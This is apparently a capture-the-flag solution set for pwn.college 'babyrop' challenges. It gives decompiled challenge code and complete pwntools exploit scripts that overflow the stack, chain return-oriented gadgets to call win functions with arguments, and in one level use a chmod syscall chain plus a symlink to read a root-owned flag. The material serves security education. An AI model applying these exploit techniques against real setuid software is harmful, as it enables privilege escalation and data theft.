1 collapsed line
1
int __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  _QWORD v4[3]; // [rsp+0h] [rbp-60h] BYREF
4
  int v5; // [rsp+1Ch] [rbp-44h]
5
  _BYTE buf[60]; // [rsp+20h] [rbp-40h] BYREF
6
  int v7; // [rsp+5Ch] [rbp-4h]
7
  __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF
8
  _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF
22 collapsed lines
9

10
  v5 = a1;
11
  v4[2] = a2;
12
  v4[1] = a3;
13
  puts(
14
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
15
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
16
  sp_ = (__int64)v4;
17
  bp_ = (__int64)&savedregs;
18
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
19
  rp_ = (__int64)&retaddr;
20
  puts("In this challenge, there is a win() function.");
21
  printf("win() will open the flag and send its data to stdout; it is at %p.\n", win);
22
  puts("In order to get the flag, you will need to call this function.\n");
23
  puts("You can call a function by directly overflowing into the saved return address,");
24
  printf(
25
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
26
    (const void *)rp_,
27
    rp_ - (_QWORD)buf);
28
  printf(
29
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
30
    rp_ - (_QWORD)buf + 8,
31
    57);
32
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_QWORD)buf - 57);
33
  puts("and 8 that will overwrite the return address).");
34
  v7 = read(0, buf, 0x1000uLL);
35
  printf("Received %d bytes! This is potentially %d gadgets.\n", v7, (unsigned __int64)&buf[v7 - rp_] >> 3);
36
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
37
  puts("from within this challenge. You will have to do that by yourself.");
3 collapsed lines
38
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v7 - rp_] >> 3) + 1);
39
  return puts("Leaving!");
40
}

1
__uid_t win()
2
{
3
  int *v0; // rax
4
  char *v1; // rax
5
  __uid_t result; // eax
6
  int *v3; // rax
7
  char *v4; // rax
8

9
  puts("You win! Here is your flag:");
10
  flag_fd_23114 = open("/flag", 0);
11
  if ( flag_fd_23114 >= 0 )
12
  {
13
    flag_length_23115 = read(flag_fd_23114, &flag_23113, 0x100uLL);
14
    if ( flag_length_23115 > 0 )
15
    {
16
      write(1, &flag_23113, flag_length_23115);
17
      return puts("\n");
18
    }
19
    else
20
    {
21
      v3 = __errno_location();
22
      v4 = strerror(*v3);
23
      return printf("\n  ERROR: Failed to read the flag -- %s!\n", v4);
24
    }
25
  }
26
  else
27
  {
28
    v0 = __errno_location();
29
    v1 = strerror(*v0);
30
    printf("\n  ERROR: Failed to open the flag -- %s!\n", v1);
31
    result = geteuid();
32
    if ( result )
33
    {
34
      puts("  Your effective user id is not 0!");
35
      return puts("  You must directly run the suid binary in order to have the correct permissions!");
36
    }
37
  }
38
  return result;
39
}

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, p64, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyrop_level1.0"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14
padding_to_ret = b"".ljust(0x48, b"A")
15
win_address = p64(0x401926)
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
def send_payload(target, payload):
34
    try:
35
        target.send(payload)
36
    except Exception as e:
37
        log.exception(f"An error occurred while sending payload: {e}")
38

39

40
def construct_payload():
41
    payload = padding_to_ret
42
    payload += win_address
43

44
    return payload
45

46

47
def attack(target, payload):
48
    try:
49
        send_payload(target, payload)
50
        target.recvall(timeout=3)
51
    except Exception as e:
52
        log.exception(f"An error occurred while performing attack: {e}")
53

54

55
def main():
56
    try:
57
        target = launch(debug=False)
58
        payload = construct_payload()
59

60
        attack(target, payload)
61
    except Exception as e:
62
        log.exception(f"An error occurred in main: {e}")
63

64

65
if __name__ == "__main__":
66
    main()

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, p64, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyrop_level1.1"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14
padding_to_ret = b"".ljust(0x68, b"A")
15
win_address = p64(0x401CAF)
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
def send_payload(target, payload):
34
    try:
35
        target.send(payload)
36
    except Exception as e:
37
        log.exception(f"An error occurred while sending payload: {e}")
38

39

40
def construct_payload():
41
    payload = padding_to_ret
42
    payload += win_address
43

44
    return payload
45

46

47
def attack(target, payload):
48
    try:
49
        send_payload(target, payload)
50
        target.recvall(timeout=3)
51
    except Exception as e:
52
        log.exception(f"An error occurred while performing attack: {e}")
53

54

55
def main():
56
    try:
57
        target = launch(debug=False)
58
        payload = construct_payload()
59

60
        attack(target, payload)
61
    except Exception as e:
62
        log.exception(f"An error occurred in main: {e}")
63

64

65
if __name__ == "__main__":
66
    main()

30 collapsed lines
1
int __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  _QWORD v4[3]; // [rsp+0h] [rbp-80h] BYREF
4
  int v5; // [rsp+1Ch] [rbp-64h]
5
  _BYTE buf[92]; // [rsp+20h] [rbp-60h] BYREF
6
  int v7; // [rsp+7Ch] [rbp-4h]
7
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
8
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF
9

10
  v5 = a1;
11
  v4[2] = a2;
12
  v4[1] = a3;
13
  puts(
14
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
15
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
16
  sp_ = (__int64)v4;
17
  bp_ = (__int64)&savedregs;
18
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
19
  rp_ = (__int64)&retaddr;
20
  puts(
21
    "In this challenge, there are 2 stages of win functions. The functions are labeled `win_stage_1` through `win_stage_2`.");
22
  puts("In order to get the flag, you will need to call all of these stages in order.\n");
23
  puts("You can call a function by directly overflowing into the saved return address,");
24
  printf(
25
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
26
    (const void *)rp_,
27
    rp_ - (_QWORD)buf);
28
  printf(
29
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
30
    rp_ - (_QWORD)buf + 8,
31
    79);
32
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_QWORD)buf - 79);
33
  puts("and 8 that will overwrite the return address).");
34
  v7 = read(0, buf, 0x1000uLL);
35
  printf("Received %d bytes! This is potentially %d gadgets.\n", v7, (unsigned __int64)&buf[v7 - rp_] >> 3);
36
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
37
  puts("from within this challenge. You will have to do that by yourself.");
3 collapsed lines
38
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v7 - rp_] >> 3) + 1);
39
  return puts("Leaving!");
40
}

1
int win_stage_1()
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v2; // [rsp+114h] [rbp-Ch]
5
  int v3; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  fd = open("/flag", 0);
9
  v3 = lseek(fd, 0LL, 2) / 2 + 1;
10
  lseek(fd, 0LL, 0);
11
  v2 = read(fd, buf, v3);
12
  write(1, buf, v2);
13
  return close(fd);
14
}

1
int win_stage_2()
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v2; // [rsp+114h] [rbp-Ch]
5
  int v3; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  fd = open("/flag", 0);
9
  v3 = lseek(fd, 0LL, 2) / 2 + 1;
10
  lseek(fd, v3, 0);
11
  v2 = read(fd, buf, v3);
12
  write(1, buf, v2);
13
  return close(fd);
14
}

1
// attributes: thunk
2
__off_t lseek(int fd, __off_t offset, int whence)
3
{
4
  return lseek(fd, offset, whence);
5
}

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, p64, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyrop_level2.0"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14
padding_to_ret = b"".ljust(0x68, b"A")
15
win_stage_1 = p64(0x401D66)
16
win_stage_2 = p64(0x401E13)
17

18

19
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
20
    if local:
21
        elf = ELF(FILE)
22
        context.binary = elf
23

24
        if debug:
25
            return gdb.debug(
26
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
27
            )
28
        else:
29
            return process([elf.path] + (argv or []), env=envp)
30
    else:
31
        return remote(HOST, PORT)
32

33

34
def send_payload(target, payload):
35
    try:
36
        target.send(payload)
37
    except Exception as e:
38
        log.exception(f"An error occurred while sending payload: {e}")
39

40

41
def construct_payload():
42
    payload = padding_to_ret
43
    payload += win_stage_1
44
    payload += win_stage_2
45

46
    return payload
47

48

49
def attack(target, payload):
50
    try:
51
        send_payload(target, payload)
52
        target.recvall(timeout=3)
53
    except Exception as e:
54
        log.exception(f"An error occurred while performing attack: {e}")
55

56

57
def main():
58
    try:
59
        target = launch(debug=False)
60
        payload = construct_payload()
61

62
        attack(target, payload)
63
    except Exception as e:
64
        log.exception(f"An error occurred in main: {e}")
65

66

67
if __name__ == "__main__":
68
    main()

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, p64, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyrop_level2.1"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14
padding_to_ret = b"".ljust(0x28, b"A")
15
win_stage_1 = p64(0x401F0F)
16
win_stage_2 = p64(0x401FBC)
17

18

19
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
20
    if local:
21
        elf = ELF(FILE)
22
        context.binary = elf
23

24
        if debug:
25
            return gdb.debug(
26
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
27
            )
28
        else:
29
            return process([elf.path] + (argv or []), env=envp)
30
    else:
31
        return remote(HOST, PORT)
32

33

34
def send_payload(target, payload):
35
    try:
36
        target.send(payload)
37
    except Exception as e:
38
        log.exception(f"An error occurred while sending payload: {e}")
39

40

41
def construct_payload():
42
    payload = padding_to_ret
43
    payload += win_stage_1
44
    payload += win_stage_2
45

46
    return payload
47

48

49
def attack(target, payload):
50
    try:
51
        send_payload(target, payload)
52
        target.recvall(timeout=3)
53
    except Exception as e:
54
        log.exception(f"An error occurred while performing attack: {e}")
55

56

57
def main():
58
    try:
59
        target = launch(debug=False)
60
        payload = construct_payload()
61

62
        attack(target, payload)
63
    except Exception as e:
64
        log.exception(f"An error occurred in main: {e}")
65

66

67
if __name__ == "__main__":
68
    main()

4 collapsed lines
1
int __fastcall win_stage_1(int a1)
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v3; // [rsp+114h] [rbp-Ch]
5
  int v4; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  if ( a1 != 1 )
9
    return puts("Error: Incorrect value!");
10
  fd = open("/flag", 0);
11
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
12
  lseek(fd, 0LL, 0);
4 collapsed lines
13
  v3 = read(fd, buf, v4);
14
  write(1, buf, v3);
15
  return close(fd);
16
}

4 collapsed lines
1
int __fastcall win_stage_2(int a1)
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v3; // [rsp+114h] [rbp-Ch]
5
  int v4; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  if ( a1 != 2 )
9
    return puts("Error: Incorrect value!");
10
  fd = open("/flag", 0);
11
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
12
  lseek(fd, v4, 0);
4 collapsed lines
13
  v3 = read(fd, buf, v4);
14
  write(1, buf, v3);
15
  return close(fd);
16
}

4 collapsed lines
1
int __fastcall win_stage_3(int a1)
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v3; // [rsp+114h] [rbp-Ch]
5
  int v4; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  if ( a1 != 3 )
9
    return puts("Error: Incorrect value!");
10
  fd = open("/flag", 0);
11
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
12
  lseek(fd, 2 * v4, 0);
4 collapsed lines
13
  v3 = read(fd, buf, v4);
14
  write(1, buf, v3);
15
  return close(fd);
16
}

4 collapsed lines
1
int __fastcall win_stage_4(int a1)
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v3; // [rsp+114h] [rbp-Ch]
5
  int v4; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  if ( a1 != 4 )
9
    return puts("Error: Incorrect value!");
10
  fd = open("/flag", 0);
11
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
12
  lseek(fd, 3 * v4, 0);
4 collapsed lines
13
  v3 = read(fd, buf, v4);
14
  write(1, buf, v3);
15
  return close(fd);
16
}

4 collapsed lines
1
int __fastcall win_stage_5(int a1)
2
{
3
  _BYTE buf[260]; // [rsp+10h] [rbp-110h] BYREF
4
  int v3; // [rsp+114h] [rbp-Ch]
5
  int v4; // [rsp+118h] [rbp-8h]
6
  int fd; // [rsp+11Ch] [rbp-4h]
7

8
  if ( a1 != 5 )
9
    return puts("Error: Incorrect value!");
10
  fd = open("/flag", 0);
11
  v4 = (int)lseek(fd, 0LL, 2) / 5 + 1;
12
  lseek(fd, 4 * v4, 0);
4 collapsed lines
13
  v3 = read(fd, buf, v4);
14
  write(1, buf, v3);
15
  return close(fd);
16
}

1
#!/usr/bin/python3
2

3
from pwn import ELF, ROP, context, gdb, log, p64, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyrop_level3.0"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
b *challenge+337
12
b *challenge+488
13
c
14
"""
15

16
padding_to_ret = b"".ljust(0x68, b"A")
17

18
win_stage_1 = p64(0x4023D9)
19
bypass_win_stage_1 = p64(0x1)
20
win_stage_2 = p64(0x402760)
21
bypass_win_stage_2 = p64(0x2)
22
win_stage_3 = p64(0x402598)
23
bypass_win_stage_3 = p64(0x3)
24
win_stage_4 = p64(0x40267A)
25
bypass_win_stage_4 = p64(0x4)
26
win_stage_5 = p64(0x4024B5)
27
bypass_win_stage_5 = p64(0x5)
28

29

30
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
31
    if local:
32
        global elf
33

34
        elf = ELF(FILE)
35
        context.binary = elf
36

37
        if debug:
38
            return gdb.debug(
39
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
40
            )
41
        else:
42
            return process([elf.path] + (argv or []), env=envp)
43
    else:
44
        return remote(HOST, PORT)
45

46

47
def send_payload(target, payload):
48
    try:
49
        target.send(payload)
50
    except Exception as e:
51
        log.exception(f"An error occurred while sending payload: {e}")
52

53

54
def construct_payload():
55
    rop = ROP(elf)
56

57
    pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address
58

59
    payload = padding_to_ret
60

61
    for i in range(1, 6):
62
        payload += p64(pop_rdi_ret)
63
        payload += globals()[f"bypass_win_stage_{i}"]
64
        payload += globals()[f"win_stage_{i}"]
65

66
    return payload
67

68

69
def attack(target, payload):
70
    try:
71
        send_payload(target, payload)
72

73
        response = target.recvall(timeout=3)
74

75
        if b"pwn.college{" in response:
76
            return True
77
    except Exception as e:
78
        log.exception(f"An error occurred while performing attack: {e}")
79

80

81
def main():
82
    try:
83
        target = launch(debug=False)
84
        payload = construct_payload()
85

86
        if attack(target, payload):
87
            exit()
88
    except Exception as e:
89
        log.exception(f"An error occurred in main: {e}")
90

91

92
if __name__ == "__main__":
93
    main()

1
#!/usr/bin/python3
2

3
from pwn import ELF, ROP, context, gdb, log, p64, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyrop_level3.1"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14
padding_to_ret = b"".ljust(0x58, b"A")
15

16
win_stage_1 = p64(0x4015E3)
17
bypass_win_stage_1 = p64(0x1)
18
win_stage_2 = p64(0x40133A)
19
bypass_win_stage_2 = p64(0x2)
20
win_stage_3 = p64(0x4016BF)
21
bypass_win_stage_3 = p64(0x3)
22
win_stage_4 = p64(0x40141A)
23
bypass_win_stage_4 = p64(0x4)
24
win_stage_5 = p64(0x401500)
25
bypass_win_stage_5 = p64(0x5)
26

27

28
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
29
    if local:
30
        global elf
31

32
        elf = ELF(FILE)
33
        context.binary = elf
34

35
        if debug:
36
            return gdb.debug(
37
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
38
            )
39
        else:
40
            return process([elf.path] + (argv or []), env=envp)
41
    else:
42
        return remote(HOST, PORT)
43

44

45
def send_payload(target, payload):
46
    try:
47
        target.send(payload)
48
    except Exception as e:
49
        log.exception(f"An error occurred while sending payload: {e}")
50

51

52
def construct_payload():
53
    rop = ROP(elf)
54

55
    pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address
56

57
    payload = padding_to_ret
58

59
    for i in range(1, 6):
60
        payload += p64(pop_rdi_ret)
61
        payload += globals()[f"bypass_win_stage_{i}"]
62
        payload += globals()[f"win_stage_{i}"]
63

64
    return payload
65

66

67
def attack(target, payload):
68
    try:
69
        send_payload(target, payload)
70

71
        response = target.recvall(timeout=3)
72

73
        if b"pwn.college{" in response:
74
            return True
75
    except Exception as e:
76
        log.exception(f"An error occurred while performing attack: {e}")
77

78

79
def main():
80
    try:
81
        target = launch(debug=False)
82
        payload = construct_payload()
83

84
        if attack(target, payload):
85
            exit()
86
    except Exception as e:
87
        log.exception(f"An error occurred in main: {e}")
88

89

90
if __name__ == "__main__":
91
    main()

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    ROP,
6
    constants,
7
    context,
8
    flat,
9
    gdb,
10
    log,
11
    os,
12
    process,
13
    remote,
14
)
15

16
context(log_level="debug", terminal="kitty")
17

18
FILE = "./babyrop_level4.0"
19
HOST, PORT = "localhost", 1337
20

21
gdbscript = """
22
b *challenge+396
23
c
24
"""
25

26

27
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
28
    if local:
29
        global elf
30

31
        elf = ELF(FILE)
32
        context.binary = elf
33

34
        if debug:
35
            return gdb.debug(
36
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
37
            )
38
        else:
39
            return process([elf.path] + (argv or []), env=envp)
40
    else:
41
        return remote(HOST, PORT)
42

43

44
def send_payload(target, payload):
45
    try:
46
        target.send(payload)
47
    except Exception as e:
48
        log.exception(f"An error occurred while sending payload: {e}")
49

50

51
def construct_payload():
52
    rop = ROP(elf)
53

54
    padding_to_ret = b"".ljust(0x48, b"A")
55

56
    filename = next(elf.search(b"ret"))
57
    mode = 0o4
58

59
    pop_rdi_ret = rop.rdi.address
60
    pop_rsi_ret = rop.rsi.address
61
    pop_rax_ret = rop.rax.address
62
    syscall = rop.syscall.address
63

64
    payload = padding_to_ret
65
    payload += flat(
66
        pop_rdi_ret,
67
        filename,
68
        pop_rsi_ret,
69
        mode,
70
        pop_rax_ret,
71
        constants.SYS_chmod,
72
        syscall,
73
    )
74

75
    return payload
76

77

78
def attack(target, payload):
79
    try:
80
        os.system("ln -s /flag ret")
81

82
        send_payload(target, payload)
83

84
        target.recvall(timeout=3)
85

86
        try:
87
            with open("/flag", "r") as file:
88
                content = file.read()
89
                log.success(content)
90

91
                return True
92
        except FileNotFoundError:
93
            log.exception("The file '/flag' does not exist.")
94
        except PermissionError:
95
            log.failure("Permission denied to read '/flag'.")
96
        except Exception as e:
97
            log.exception(f"An error occurred while performing attack: {e}")
98
    except Exception as e:
99
        log.exception(f"An error occurred while performing attack: {e}")
100

101

102
def main():
103
    try:
104
        target = launch(debug=False)
105
        payload = construct_payload()
106

107
        if attack(target, payload):
108
            exit()
109
    except Exception as e:
110
        log.exception(f"An error occurred in main: {e}")
111

112

113
if __name__ == "__main__":
114
    main()